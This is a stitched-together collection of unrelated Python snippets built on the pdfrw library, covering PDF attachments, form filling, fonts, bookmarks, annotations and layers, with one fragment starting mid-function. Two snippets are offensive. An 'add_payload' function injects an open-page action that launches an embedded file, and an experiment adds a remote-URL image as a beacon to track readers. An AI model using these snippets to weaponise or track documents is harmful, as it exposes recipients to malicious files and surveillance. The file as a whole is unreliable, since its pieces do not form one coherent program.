def _create_compressed_file_object(source): """ Create a file like object as ``/EmbeddedFile`` compressing it with deflate. :return: the object representing the compressed file stream object """ md5 = hashlib.md5() compress = zlib.compressobj() pdf_file_object = PdfDict(Type=PdfName('EmbeddedFile'), Filter=PdfName('FlateDecode')) # pdfrw needs Latin-1-decoded unicode strings in object.stream pdf_file_object.stream = '' size = 0 for data in iter(lambda: source.read(4096), b''): size += len(data) md5.update(data) pdf_file_object.stream += compress.compress(data).decode('latin-1') pdf_file_object.stream += compress.flush(zlib.Z_FINISH).decode('latin-1') pdf_file_object.Params = PdfDict(CheckSum=PdfString('<{}>'.format( md5.hexdigest())), Size=size) return pdf_file_object
def get_xml(string): """ Get XML soup from 'string'. """ if string.startswith(b'<?xml'): try: return new_xml(string) except: # pragma: no cover return None try: reader = PdfReader(fdata=string) root = reader['/Root'] msg = root.get(PdfName('Data')) return new_xml(msg.stream.encode('latin-1')) # these are legacy branches; I don't believe such files actually exist except: # pragma: no cover try: reader = PdfReader(fdata=string) root = reader['/Root'] msg = root.get(PdfName('Metadata')) return new_xml(msg.stream.encode('latin-1')) except: try: return new_xml( string.encode('latin-1').split('endstream')[0].split( 'stream')[1]) except: try: return new_xml(string.encode('latin-1')) except: return None
def create_bookmarks(bookmarks, pages, parent=None): count = len(bookmarks) bookmark_objects = [] for label, target, children in bookmarks: destination = (pages[target[0]].indirect, PdfName('XYZ'), target[1], target[2], 0) bookmark_object = PdfDict(Title=PdfString.encode(label), A=PdfDict(Type=PdfName('Action'), S=PdfName('GoTo'), D=PdfArray(destination))) bookmark_object.indirect = True children_objects, children_count = create_bookmarks( children, pages, parent=bookmark_object) bookmark_object.Count = 1 + children_count if bookmark_objects: bookmark_object.Prev = bookmark_objects[-1] bookmark_objects[-1].Next = bookmark_object if children_objects: bookmark_object.First = children_objects[0] bookmark_object.Last = children_objects[-1] if parent is not None: bookmark_object.Parent = parent count += children_count bookmark_objects.append(bookmark_object) return bookmark_objects, count
def make_image_xobject(image): """Construct a PdfDict representing the Image XObject, for inserting into the AP Resources dict. PNGs and GIFs are treated equally - the raw sample values are included using PDF's FlateDecode compression format. JPEGs can be included in their original form using the DCTDecode filter. PNGs with transparency have the alpha channel split out and included as an SMask, since PDFs don't natively support transparent PNGs. Details about file formats and allowed modes can be found at https://pillow.readthedocs.io/en/5.3.x/handbook/image-file-formats.html :param str|ImageFile image: Either a str representing the path to the image filename, or a PIL.ImageFile.ImageFile object representing the image loaded using the PIL library. :returns PdfDict: Image XObject """ image = Image.resolve_image(image) # PILImage.convert drops the format attribute image_format = image.format width, height = image.size # Normalize images to RGB or grayscale color spaces, and split out the # alpha layer into a PDF smask XObject image, smask_xobj = Image.convert_to_compatible_image( image, image_format, ) if image_format in ('PNG', 'GIF'): content = Image.make_compressed_image_content(image) filter_type = 'FlateDecode' # TODO use a predictor elif image_format == 'JPEG': content = Image.make_jpeg_image_content(image) filter_type = 'DCTDecode' else: raise ValueError( 'Unsupported image format: {}. Supported formats are ' 'PNG, JPEG, and GIF'.format(image.format)) xobj = PdfDict( stream=content, BitsPerComponent=8, Filter=PdfName(filter_type), ColorSpace=Image._get_color_space_name(image), Width=width, Height=height, Subtype=PdfName('Image'), Type=PdfName('XObject'), ) if smask_xobj is not None: xobj.SMask = smask_xobj return xobj
def add_payload(name, output, path): print('[*] Reading PDF file: %s' % name) reader = PdfReader(name) print('[*] Injecting the payload in the PDF file...') reader.pages[0].AA = PdfDict( O=PdfDict(F=r'%s' % path, D=[0, PdfName('Fit')], S=PdfName('GoToE'))) writer = PdfWriter() writer.addpages(reader.pages) print('[*] Saving modified PDF as: %s' % output) writer.write(output) print('[*] Done!')
def make_font_object(): """Make a PDF Type1 font object for embedding in the annotation's Resources dict. Only Helvetica is supported as a base font. :returns PdfDict: Resources PdfDict object, ready to be included in the Resources 'Font' subdictionary. """ return PdfDict( Type=PdfName('Font'), Subtype=PdfName('Type1'), BaseFont=PdfName(DEFAULT_BASE_FONT), Encoding=PdfName('WinAnsiEncoding'), )
def get_png_smask(image): width, height = image.size smask = Image.make_compressed_image_content(image.getchannel('A')) smask_xobj = PdfDict( stream=smask, Width=width, Height=height, BitsPerComponent=8, Filter=PdfName('FlateDecode'), ColorSpace=PdfName('DeviceGray'), Subtype=PdfName('Image'), Type=PdfName('XObject'), ) smask_xobj.indirect = True return smask_xobj
def _create_pdf_attachment(attachment, url_fetcher): """ Create an attachment to the PDF stream :return: the object representing the ``/Filespec`` object or :obj:`None` if the attachment couldn't be read. """ try: # Attachments from document links like <link> or <a> can only be URLs. # They're passed in as tuples if isinstance(attachment, tuple): url, description = attachment attachment = Attachment(url=url, url_fetcher=url_fetcher, description=description) elif not isinstance(attachment, Attachment): attachment = Attachment(guess=attachment, url_fetcher=url_fetcher) with attachment.source as (source_type, source, url, _): if isinstance(source, bytes): source = io.BytesIO(source) pdf_file_object = _create_compressed_file_object(source) except URLFetchingError as exc: LOGGER.error('Failed to load attachment: %s', exc) return None # TODO: Use the result object from a URL fetch operation to provide more # details on the possible filename return PdfDict(Type=PdfName('Filespec'), F=PdfString.encode(''), UF=PdfString.encode(_get_filename_from_result(url, None)), EF=PdfDict(F=pdf_file_object), Desc=PdfString.encode(attachment.description or ''))
def get_form_fields_from_fdf(pdf_file_path): try: pdf_reader = PdfReader(pdf_file_path) except errors.PdfParseError: print(f'File \'{pdf_file_path}\' not found please specify full path') return None try: # Check if PDF has Form Fields and if we can read them pdf_form_fields = pdf_reader.Root.AcroForm.Fields except AttributeError: print(f'File \'{pdf_file_path}\' no Form Fields') return None # Create an empty PdfDict to collect Form Fields and Values pdf_metadata = PdfDict() # Define list of Form Fields to be ignored from transfer to PdfDict # For example: field Sig ignore_fields = ('/Sig',) # Load Form Fields into PdfDict for field in pdf_form_fields: if field.FT not in ignore_fields: field_name = field.T if field_name is not None: key_name = PdfName(field_name.decode()) pdf_metadata[key_name] = field.V return pdf_metadata
def fill_form(input_file, output_file, data): """input_file can be file object or path name output_file can be file object or path name data is dictionary with keys corresponding to the form fields""" the_pdf = PdfReader(input_file) for page in the_pdf.pages: annotations = page[ANNOT_KEY] for annotation in annotations: if annotation[SUBTYPE_KEY] == WIDGET_SUBTYPE_KEY: key = annotation[ANNOT_FIELD_KEY][1:-1] if key in data.keys(): val = data[key] if val == None: # skip nulls continue if val == True: # treat booleans as checkboxes annotation.update(PdfDict(V=PdfName("On"))) else: # set annotation value annotation.update(PdfDict(V="{}".format(val))) # and empty appearance to make field visible in Apple Preview annotation.update(PdfDict(AP="")) # mark the fields as un-editable annotation.update(PdfDict(Ff=1)) # set NeedAppearances to ensure the fields are visible in Adobe Reader if the_pdf.Root.AcroForm: the_pdf.Root.AcroForm.update( PdfDict(NeedAppearances=PdfObject("true"))) PdfWriter().write(output_file, the_pdf)
def make_cid_font_object(tt_font): """Make a CID Type 2 font object for including as a descendant of a composite Type 0 font object. :param TrueTypeFont tt_font: Our utility class used to parse and calculate font metrics from a true type font. :returns PdfDict: CID Font Type 2 PdfDict object. """ return IndirectPdfDict( Type=PdfName('Font'), Subtype=PdfName('CIDFontType2'), BaseFont=PdfName(tt_font.fontName), CIDSystemInfo=FreeText.make_cid_system_info_object(), FontDescriptor=FreeText.make_font_descriptor_object(tt_font), DW=int(round(tt_font.metrics.defaultWidth, 0)), Widths=PdfArray(tt_font.metrics.widths), CIDToGIDMap=FreeText.make_cid_to_gid_map_object(tt_font), )
def make_composite_font_object(font_file_path): """Make a PDF Type0 composite font object for embedding in the annotation's Resources dict. :param str font_file_path: The path and filename to the true type font we want to embed. :returns PdfDict: Resources PdfDict object, ready to be included in the Resources 'Font' subdictionary. """ # TODO: Get font name from font program itself tt_font = get_true_type_font(font_file_path, DEFAULT_BASE_FONT) return IndirectPdfDict(Type=PdfName('Font'), Subtype=PdfName('Type0'), BaseFont=PdfName(tt_font.fontName), Encoding=PdfName('Identity-H'), DescendantFonts=PdfArray( [FreeText.make_cid_font_object(tt_font)]), ToUnicode=FreeText.make_to_unicode_object())
def write_fillable_pdf(input_pdf_path, output_pdf_path, data_dict, camposCheckBox): template_pdf = PdfReader(input_pdf_path) #Necesario para que se vean cambios template_pdf.Root.AcroForm.update( PdfDict(NeedAppearances=PdfObject('true'))) #Por cada pagina del PDF for page in template_pdf.pages: annotations = page[ANNOT_KEY] #Para cada anotacion de la pagina for annotation in annotations: if annotation[SUBTYPE_KEY] == WIDGET_SUBTYPE_KEY: if annotation[ANNOT_FIELD_KEY]: key = annotation[ANNOT_FIELD_KEY][1:-1] if key in data_dict.keys(): #HACK PARA LOS CHECK. Si es true, se marcan, sino no if key in camposCheckBox: if (data_dict[key] == 'true'): annotation.update( PdfDict(V='{}'.format(data_dict[key]), AS=PdfName('Yes'))) #Si no se pone nada, por defecto no se marcan continue #Objeto necesario para que al rellenar se vean los campos rct = annotation.Rect hight = round(float(rct[3]) - float(rct[1]), 2) width = (round(float(rct[2]) - float(rct[0]), 2)) xobj = PdfDict( BBox=[0, 0, width, hight], FormType=1, Resources=PdfDict( ProcSet=[PdfName.PDF, PdfName.Text]), Subtype=PdfName.Form, Type=PdfName.XObject) #assign a stream to it xobj.stream = '''/Tx BMC BT /Helvetica 8.0 Tf 1.0 5.0 Td 0 g (''' + data_dict[key] + ''') Tj ET EMC''' #Actualizamos la anotacion en el PDF annotation.update( PdfDict(AP=PdfDict(N=xobj), V='{}'.format(data_dict[key]))) #Escribimos el PDF ya anotado al PATH de salida PdfWriter().write(output_pdf_path, template_pdf)
def make_font_descriptor_object(tt_font): """Make a Font Descriptor object containing some calculated metrics for the font. :param TrueTypeFont tt_font: Our utility class used to parse and calculate font metrics from a true type font. :returns PdfDict: Font Descriptor PdfDict object. """ return IndirectPdfDict( Type=PdfName('FontDescriptor'), FontName=PdfName(tt_font.fontName), Flags=tt_font.metrics.flags, FontBBox=tt_font.metrics.bbox, ItalicAngle=int(tt_font.metrics.italicAngle), Ascent=int(round(tt_font.metrics.ascent, 0)), Descent=int(round(tt_font.metrics.descent, 0)), CapHeight=int(round(tt_font.metrics.capHeight, 0)), StemV=int(round(tt_font.metrics.stemV, 0)), MissingWidth=int(round(tt_font.metrics.defaultWidth, 0)), FontFile2=FreeText.make_font_file_object(tt_font))
def create_highlight(points, color=(1, 0.92, 0.23), author=None, contents=None): """Given Quad points, create a highligh object in standard pdf format.""" new_highlight = PdfDict() new_highlight.F = 4 new_highlight.Type = PdfName('Annot') new_highlight.Subtype = PdfName('Highlight') if author: new_highlight.T = author new_highlight.C = color if contents: new_highlight.Contents = contents new_highlight.indirect = True ############################################################# ### Search for bounding coordinates ############################################################# bot_left_x = float('inf') bot_left_y = float('inf') top_right_x = 0.0 top_right_y = 0.0 quad_pts = [] for (x1, y1, x2, y2) in points: # this quadpoints specified PDF definition of rect box quad_pts.extend([x1, y2, x2, y2, x1, y1, x2, y1]) bot_left_x = min(bot_left_x, x1, x2) bot_left_y = min(bot_left_y, y1, y2) top_right_x = max(top_right_x, x1, x2) top_right_y = max(top_right_y, y1, y2) new_highlight.QuadPoints = PdfArray(quad_pts) new_highlight.Rect = PdfArray( [bot_left_x, bot_left_y, top_right_x, top_right_y]) return new_highlight
def apply_annotations(rmpage, page_annot, ocgorderinner): for k, layer_a in enumerate(page_annot): layerannots = layer_a[1] for a in layerannots: # PDF origin is in bottom-left, so invert all # y-coordinates. author = 'RCU' #self.model.device_info['rcuname'] pdf_a = PdfDict(Type=PdfName('Annot'), Rect=PdfArray([(a[1] * PTPERPX), PDFHEIGHT - (a[2] * PTPERPX), (a[3] * PTPERPX), PDFHEIGHT - (a[4] * PTPERPX)]), T=author, ANN='pdfmark', Subtype=PdfName(a[0]), P=rmpage) # Set to indirect because it makes a cleaner PDF # output. pdf_a.indirect = True if ocgorderinner: pdf_a.OC = ocgorderinner[k] if not '/Annots' in rmpage: rmpage.Annots = PdfArray() rmpage.Annots.append(pdf_a)
def fix_metadata(doc, title=None, creation_date=None): # Clear any existing XMP meta data doc.Root.Metadata = None meta = { 'Creator': 'OffeneGesetze.de', 'Keywords': 'Amtliches Werk nach §5 UrhG https://offenegesetze.de', 'ModDate': make_pdf_date(datetime.now()), } if title is not None: meta['Title'] = title if creation_date is not None: meta['CreationDate'] = make_pdf_date(creation_date) for key, val in meta.items(): if 'Date' not in key: val = PdfString.from_unicode(val) doc.Info[PdfName(key)] = val
def getPages(allpages, x, y, gap): # Number of pages to combine count = x * y # Pull pages off the list pages = [pagexobj(p) for p in allpages[:count]] del allpages[:count] # Out page size width_max = max(page.BBox[2] for page in pages) height_max = max(page.BBox[3] for page in pages) stream = [] xobjdict = PdfDict() line = y for index, page in enumerate(pages): width = (index % x) * width_max / x if not width: line = line - 1 height = line * height_max / y # Page number index = PdfName('P{}'.format(index)) format_stream = { "x": 1./x - gap, "y": 1./y - gap, "w": width, "h": height, "i": index } stream.append('q {x} 0 0 {y} {w} {h} cm {i} Do Q\n'.format(**format_stream)) xobjdict[index] = page return PdfDict( Type = PdfName.Page, Contents = PdfDict(stream=''.join(stream)), MediaBox = PdfArray([-1000*gap, -1000*gap, width_max, height_max]), Resources = PdfDict(XObject = xobjdict), )
def concatenate(input_paths, output_path, details=None): """Given an ordered sequence of paths to pdf files, concatenate to the desired output path with the given details. Args: input_paths: A sequence of paths to pdf files. output_path: The desired path for the concatenated pdf. details: A dictionary of metadata values desired for the final pdf. """ writer = PdfWriter() for path in input_paths: reader = PdfReader(path) writer.addpages(reader.pages) writer.trailer.Info = IndirectPdfDict() if details is not None: for metadata, value in details.items(): writer.trailer.Info[PdfName(metadata)] = value writer.write(output_path)
def test_graphics_state(self): state = GraphicsState( line_width=2, line_cap=constants.LINE_CAP_ROUND, line_join=constants.LINE_JOIN_MITER, miter_limit=1.404, dash_array=[[1], 0], stroke_transparency=0.7, fill_transparency=0.5, ) pdf_dict = state.as_pdf_dict() assert pdf_dict == PdfDict( Type=PdfName('ExtGState'), LW=2, LC=1, LJ=0, ML=1.404, D=[[1], 0], CA=0.7, ca=0.5, )
1.0 5.0 Td 0 g (''' + data_dict[key] + ''') Tj ET EMC''' annotation.update( PdfDict(AP=PdfDict(N=xobj), V='{}'.format(data_dict[key]))) #annotation.update(pdfrw.PdfDict(V='{}'.format(data_dict[key]),AP='{}'.format(data_dict[key]))) PdfWriter().write(output_pdf_path, template_pdf) data_dict = { 'untitled1': '46017675', #Codigo de centro 'untitled5': 'IES La Sènia', #Nombre del centro 'untitled6': PdfName('Yes'), #Centro titularidad publica 'untitled2': 'Paiporta', #Localidad centro 'untitled4': 'Valencia', #Provincia centro 'untitled8': '961 20 59 55', #Telefono Centro 'untitled3': 'Calle Escultor José Capuz, 96', #Direccion Centro 'untitled9': '46200', #Codigo Postal Centro 'untitled10': 'NIA', #NIA Alumno 'untitled11': 'Curso', #Curso Alumno 'untitled12': 'Apellidos, Nombre', #Apellidos, Nombre - Alumnos 'untitled15': 'Desarrollo de Aplicaciones Web', #Titulo ciclo 'untitled16': 'Superior', #Grado ciclo 'untitled18': 'Punto 1.1', #Punto 1.1 'untitled17': 'Punto 1.2', #Punto 1.2 'untitled19': 'Punto 1.3', #Punto 1.3 'untitled20': 'Punto 1.4', #Punto 1.4 'untitled21': 'true', #Check Avanzado
def pdfdict(self): """Return a PageLabel entry to pe inserted in the root of a PdfReader object""" nums = (i for label in sorted(self) for i in label.pdfobjs()) return PdfDict(Type=PdfName("Catalog"), Nums = PdfArray(nums))
#!/usr/bin/env python3 from collections import namedtuple from pdfrw import PdfName, PdfDict, PdfObject, PdfString PageLabelTuple = namedtuple("PageLabelScheme", "startpage style prefix firstpagenum") defaults = {"style": "arabic", "prefix": '', "firstpagenum": 1} styles = { "arabic": PdfName('D'), "roman lowercase": PdfName('r'), "roman uppercase": PdfName('R'), "letters lowercase": PdfName('a'), "letters uppercase": PdfName('A') } stylecodes = {v: a for a, v in styles.items()} class PageLabelScheme(PageLabelTuple): """Represents a page numbering scheme. startpage : the index in the pdf (starting from 0) of the first page the scheme will be applied to. style : page numbering style (arabic, roman [lowercase|uppercase], letters [lowercase|uppercase]) prefix: a prefix to be prepended to all page labels firstpagenum : where to start numbering """ __slots__ = tuple() def __new__(cls, startpage, style=defaults["style"],
def join_files(input_files, output_file): """input_files is a list of file objects or path names output_file can be file object or path name""" # standard PdfWriter does not copy AcroForm objects # modified from https://stackoverflow.com/a/57687160 output = PdfWriter() output_acroform = None for pdf in input_files: input = PdfReader(pdf, verbose=False) output.addpages(input.pages) if (PdfName("AcroForm") in input[PdfName("Root")].keys() ): # Not all PDFs have an AcroForm node source_acroform = input[PdfName("Root")][PdfName("AcroForm")] if PdfName("Fields") in source_acroform: output_formfields = source_acroform[PdfName("Fields")] else: output_formfields = [] if output_acroform == None: # copy the first AcroForm node output_acroform = source_acroform else: for key in source_acroform.keys(): # Add new AcroForms keys if output_acroform already existing if key not in output_acroform: output_acroform[key] = source_acroform[key] # Add missing font entries in /DR node of source file if (PdfName("DR") in source_acroform.keys()) and ( PdfName("Font") in source_acroform[PdfName("DR")].keys()): if PdfName("Font") not in output_acroform[PdfName( "DR")].keys(): # if output_acroform is missing entirely the /Font node under an existing /DR, simply add it output_acroform[PdfName("DR")][PdfName( "Font")] = source_acroform[PdfName("DR")][PdfName( "Font")] else: # else add new fonts only for font_key in source_acroform[PdfName("DR")][PdfName( "Font")].keys(): if (font_key not in output_acroform[PdfName("DR")][ PdfName("Font")]): output_acroform[PdfName("DR")][PdfName( "Font")][font_key] = source_acroform[ PdfName("DR")][PdfName( "Font")][font_key] if PdfName("Fields") not in output_acroform: output_acroform[PdfName("Fields")] = output_formfields else: # Add new fields output_acroform[PdfName("Fields")] += output_formfields output.trailer[PdfName("Root")][PdfName("AcroForm")] = output_acroform output.write(output_file)
def do_apply_ocg(basepage, rmpage, i, uses_base_pdf, ocgprop, annotations): ocgpage = IndirectPdfDict(Type=PdfName('OCG'), Name='Page ' + str(i + 1)) ocgprop.OCGs.append(ocgpage) # The Order dict is a Page, followed by Inner ocgorderinner = PdfArray() # Add Template OCG layer # If this uses a basepdf, the template is located # elsewhere. # If using a basepdf, assign its stream as a # 'Background' layer under this page. When the page # primary OCG is disabled, the background will # remain, making it easy to disable all annotations. if uses_base_pdf: ocgorigdoc = IndirectPdfDict(Type=PdfName('OCG'), Name='Background') ocgprop.OCGs.append(ocgorigdoc) ocgorderinner.append(ocgorigdoc) uncompress.uncompress([basepage.Contents]) stream = basepage.Contents.stream stream = '/OC /ocgorigdoc BDC\n' \ + stream \ + 'EMC\n' basepage.Contents.stream = stream compress.compress([basepage.Contents]) if '/Properties' in basepage.Resources: props = basepage.Resources.Properties else: props = PdfDict() props.ocgorigdoc = ocgorigdoc basepage.Resources.Properties = props # If not using a basepdf, assign the rmpage's stream # as a 'Template' layer under this page. It will be # affected by disabling the primary Page OCG (which # by itself is kind of useless for exported # notebooks). # Regardless of using a basepdf or not, put the # rmpage layers into their own OCGs. # If the template has an XObject, we want to skip # the first one. This happens when the template # contains a PNG. Question--what happens when the # template contains more than one PNG? How do we # detect all of those? template_xobj_keys = [] vector_layers = [] uncompress.uncompress([rmpage.Contents]) if uses_base_pdf: # The entire thing is the page ocg stream = '/OC /ocgpage BDC\n' stream += rmpage.Contents.stream stream += 'EMC\n' rmpage.Contents.stream = stream else: stream = rmpage.Contents.stream # Mark the template ocg separate from page ocg template_endpos = 0 page_inatpos = 0 findkey = '1 w 2 J 2 j []0 d\nq\n' # Finds only the first instance, which should be # for the template. findloc = stream.find(findkey) if findloc < 0: # May be a vector, which we stick a marker # in for. # ?? Why is this a half-point off ?? findkey = '799.500000 85 l\n' m = re.search(findkey, rmpage.Contents.stream) if m: findloc = m.start() if findloc > 0: template_endpos = findloc + len(findkey) # Add vector template OCG stream = '/OC /ocgtemplate BDC\n' stream += rmpage.Contents.stream[:template_endpos] stream += 'EMC\n' page_inatpos = len(stream) stream += rmpage.Contents.stream[template_endpos:] # Save stream rmpage.Contents.stream = stream # Add template ocg ocgtemplate = IndirectPdfDict(Type=PdfName('OCG'), Name='Template') ocgprop.OCGs.append(ocgtemplate) ocgorderinner.append(ocgtemplate) # If a template (which is SVG) has embedded PNG # images, those appear as XObjects. This will # mess up the layer order, so we will ignore # them later. template_xobj_keys = \ re.findall(r'(\/Im[0-9]+)\s', stream[:template_endpos]) # Page ocg stream = rmpage.Contents.stream[:page_inatpos] stream += '/OC /ocgpage BDC\n' stream += rmpage.Contents.stream[page_inatpos:] stream += 'EMC\n' # Save stream rmpage.Contents.stream = stream # Find all other vector layers using the magic # point (DocumentPageLayer.render_to_painter()). # ?? Why is this a half-point off ?? while True: m = re.search('420.500000 69 m\n', rmpage.Contents.stream) if not m: break stream = '' layerid = 'ocglayer{}'.format(len(vector_layers) + 1) stream = rmpage.Contents.stream[:m.start()] if len(vector_layers): # close previous layer stream += 'EMC\n' stream += '/OC /{} BDC\n'.format(layerid) stream += rmpage.Contents.stream[m.end():] vector_layers.append(layerid) rmpage.Contents.stream = stream # If we added vector layers, have to end the # first one. if len(vector_layers): stream = rmpage.Contents.stream + 'EMC\n' rmpage.Contents.stream = stream # Done--recompress the stream. compress.compress([rmpage.Contents]) # There shouldn't be any Properties there since we # generated the rmpage ourselves, so don't bother # checking. rmpage.Resources.Properties = PdfDict(ocgpage=ocgpage) if not uses_base_pdf: rmpage.Resources.Properties.ocgtemplate = ocgtemplate # Add individual OCG layers (Bitmap) was_vector = True for n, key in enumerate(rmpage.Resources.XObject): if str(key) in template_xobj_keys: continue was_vector = False l = n - len(template_xobj_keys) # This would indicate a bug in the handling of a # notebook. try: layer = annotations[i][l] except: log.error( 'could not associate XObject with layer: (i, l) ({}, {})'. format(i, l)) log.error(str(annotations)) log.error('document: {} ()').format('uuid', 'self.visible_name') continue layername = layer[0] ocg = IndirectPdfDict(Type=PdfName('OCG'), Name=layername) ocgprop.OCGs.append(ocg) ocgorderinner.append(ocg) rmpage.Resources.XObject[key].OC = ocg # Add individual OCG layers (Vector) if was_vector: for l, layerid in enumerate(vector_layers): # This would indicate a bug in the handling of a # notebook. try: layer = annotations[i][l] except: log.error( 'could not associate layerid with layer: (i, l, layerid) ({}, {}, {})' .format(i, l, layerid)) log.error('document: {} ()').format('uuid', 'self.visible_name') log.error(str(annotations)) continue layername = layer[0] ocg = IndirectPdfDict(Type=PdfName('OCG'), Name=layername) ocgprop.OCGs.append(ocg) ocgorderinner.append(ocg) rmpage.Resources.Properties[PdfName(layerid)] = \ ocg # Add order of OCGs to primary document ocgprop.D.Order.append(ocgpage) ocgprop.D.Order.append(ocgorderinner) return ocgorderinner
def test_blank(self): pdf_dict = GraphicsState().as_pdf_dict() assert len(pdf_dict) == 1 assert pdf_dict.Type == PdfName('ExtGState')
def add_additional_resources(self, resources): font_dict = PdfDict() font_dict[PdfName(PDF_ANNOTATOR_FONT)] = self.make_font_object() resources[PdfName('Font')] = font_dict
alt_img = PdfDict(Type=PdfName.XObject, SubType=PdfName.Image, BitsPerComponent=8, ColorSpace=PdfName.DeviceRGB, Height=800, Width=600, Length=0, F=PdfDict(FS=PdfName.URL, F='https://chezsoi.org/lucas/ThePatch.jpg'), FFilter=PdfName.DCTDecode) alt_img.indirect = true alternates = PdfArray([PdfDict(DefaultForPrinting=True, Image=alt_img)]) alternates.indirect = true img_name = PdfName('Image-9960') img = img_kid.Resources.XObject[img_name] img.Alternates = alternates pdf_kid.Resources.XObject = PdfDict() pdf_kid.Resources.XObject[img_name] = img out = PdfWriter() out.addpage(pdf.pages[0]) out.write('out.pdf') # CONCLUSION: neither Adobe nor Sumatra readers visit the link... # It may be that readers do not follow this "Alternates" images spec anymore, that HTTPS is not supported, or that I made a mistake in the resulting PDF. # Anyway, I'm giving up. # However Canary Tokens use a similar technic that works well (with Adobe not Sumatra): https://github.com/sumatrapdfreader/sumatrapdf/issues/1696
def _get_color_space_name(image): if image.mode == RGB_MODE: return PdfName('DeviceRGB') elif image.mode in (GRAYSCALE_MODE, SINGLE_CHANNEL_MODE): return PdfName('DeviceGray') raise ValueError('Image color space not yet supported')
def write_pdf_metadata(document, fileobj, scale, metadata, attachments, url_fetcher): """Append to a seekable file-like object to add PDF metadata.""" fileobj.seek(0) trailer = PdfReader(fileobj) pages = trailer.Root.Pages.Kids bookmarks, links = prepare_metadata(document, scale, pages) if bookmarks: bookmark_objects, count = create_bookmarks(bookmarks, pages) trailer.Root.Outlines = PdfDict(Type=PdfName('Outlines'), Count=count, First=bookmark_objects[0], Last=bookmark_objects[-1]) attachments = metadata.attachments + (attachments or []) if attachments: embedded_files = [] for attachment in attachments: attachment_object = _create_pdf_attachment(attachment, url_fetcher) if attachment_object is not None: embedded_files.append(PdfString.encode('attachment')) embedded_files.append(attachment_object) if embedded_files: trailer.Root.Names = PdfDict(EmbeddedFiles=PdfDict( Names=PdfArray(embedded_files))) # A single link can be split in multiple regions. We don't want to embedded # a file multiple times of course, so keep a reference to every embedded # URL and reuse the object number. # TODO: If we add support for descriptions this won't always be correct, # because two links might have the same href, but different titles. annot_files = {} for page_links in links: for link_type, target, rectangle in page_links: if link_type == 'attachment' and target not in annot_files: # TODO: use the title attribute as description annot_files[target] = _create_pdf_attachment((target, None), url_fetcher) # TODO: splitting a link into multiple independent rectangular annotations # works well for pure links, but rather mediocre for other annotations and # fails completely for transformed (CSS) or complex link shapes (area). # It would be better to use /AP for all links and coalesce link shapes that # originate from the same HTML link. This would give a feeling similiar to # what browsers do with links that span multiple lines. for page, page_links in zip(pages, links): annotations = PdfArray() for link_type, target, rectangle in page_links: if link_type != 'attachment' or annot_files[target] is None: annotation = PdfDict(Type=PdfName('Annot'), Subtype=PdfName('Link'), Rect=PdfArray(rectangle), Border=PdfArray((0, 0, 0))) if link_type == 'internal': destination = (target[0], PdfName('XYZ'), target[1], target[2], 0) annotation.A = PdfDict(Type=PdfName('Action'), S=PdfName('GoTo'), D=PdfArray(destination)) else: annotation.A = PdfDict(Type=PdfName('Action'), S=PdfName('URI'), URI=PdfString.encode( iri_to_uri(target))) else: assert annot_files[target] is not None ap = PdfDict(N=PdfDict(BBox=PdfArray(rectangle), Subtype=PdfName('Form'), Type=PdfName('XObject'))) # evince needs /T or fails on an internal assertion. PDF # doesn't require it. annotation = PdfDict(Type=PdfName('Annot'), Subtype=PdfName('FileAttachment'), T=PdfString.encode(''), Rect=PdfArray(rectangle), Border=PdfArray((0, 0, 0)), FS=annot_files[target], AP=ap) annotations.append(annotation) if annotations: page.Annots = annotations trailer.Info.Producer = VERSION_STRING for attr, key in (('title', 'Title'), ('description', 'Subject'), ('generator', 'Creator')): value = getattr(metadata, attr) if value is not None: setattr(trailer.Info, key, value) for attr, key in (('authors', 'Author'), ('keywords', 'Keywords')): value = getattr(metadata, attr) if value is not None: setattr(trailer.Info, key, ', '.join(getattr(metadata, attr))) for attr, key in (('created', 'CreationDate'), ('modified', 'ModDate')): value = w3c_date_to_pdf(getattr(metadata, attr), attr) if value is not None: setattr(trailer.Info, key, value) for page, document_page in zip(pages, document.pages): left, top, right, bottom = (float(value) for value in page.MediaBox) # Convert pixels into points bleed = { key: value * 0.75 for key, value in document_page.bleed.items() } trim_left = left + bleed['left'] trim_top = top + bleed['top'] trim_right = right - bleed['right'] trim_bottom = bottom - bleed['bottom'] page.TrimBox = PdfArray((trim_left, trim_top, trim_right, trim_bottom)) # Arbitrarly set PDF BleedBox between CSS bleed box (PDF MediaBox) and # CSS page box (PDF TrimBox), at most 10 points from the TrimBox. bleed_left = trim_left - min(10, bleed['left']) bleed_top = trim_top - min(10, bleed['top']) bleed_right = trim_right + min(10, bleed['right']) bleed_bottom = trim_bottom + min(10, bleed['bottom']) page.BleedBox = PdfArray( (bleed_left, bleed_top, bleed_right, bleed_bottom)) fileobj.seek(0) PdfWriter().write(fileobj, trailer=trailer) fileobj.truncate()